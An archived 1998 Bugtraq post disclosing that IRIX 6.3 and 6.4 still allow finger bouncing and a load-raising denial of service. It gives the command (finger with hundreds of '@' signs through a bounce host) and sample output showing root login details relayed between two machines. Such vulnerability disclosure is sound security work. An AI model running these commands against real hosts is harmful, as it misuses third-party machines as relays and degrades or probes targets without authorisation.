Bugtraq mailing list archives

Finger bounce and DoS still exists in IRIX 6.3 and 6.4

From: Matthew.Potter () GLOBALONE NET (Matthew Potter)
Date: Tue, 14 Jul 1998 14:58:17 -0400


This bug is pretty damn old, Why hasnt SGI fixed this yet? For more
fun....

finger -l @@@@@@@@@@@@@@@@@@@@target@bounce_host, do a @ about 500 times
;)

The target machines load goes up signifigantly. This isn't anything
exciting and new just something SGI needs to fix.


Matt

Note: fingered from external host.
bash$ finger -l @192.168.157.50@192.168.157.29
[192.168.157.29]
[192.168.157.50]
Login name: root                        In real life: Super-User
Directory: /                            Shell: /bin/csh
On since Jul 14 08:37:29 on ttyq0 from :0.0
1 minute 49 seconds Idle Time
On since Jul 13 10:28:10 on ttyq7 from :0.0
On since Jul 14 11:14:05 on ttyq5       1 minute 41 seconds Idle Time
On since Jul  9 13:06:36 on ttyq4 from :0.0
10 minutes Idle Time
On since Jul 14 11:06:26 on ttyq2       2 minutes 53 seconds Idle Time
No Plan.

Machines:

IRIX O2 6.3 12161207 IP32
192.168.157.50

IRIX64 Origin200 6.4 02121744 IP27
192.168.157.29

Current thread:

Linux and world-writable /tmp - workaround Michal Zalewski (Jul 10)
- Re: Linux and world-writable /tmp - workaround David Luyer (Jul 13)
- Finger bounce and DoS still exists in IRIX 6.3 and 6.4 Matthew Potter (Jul 14)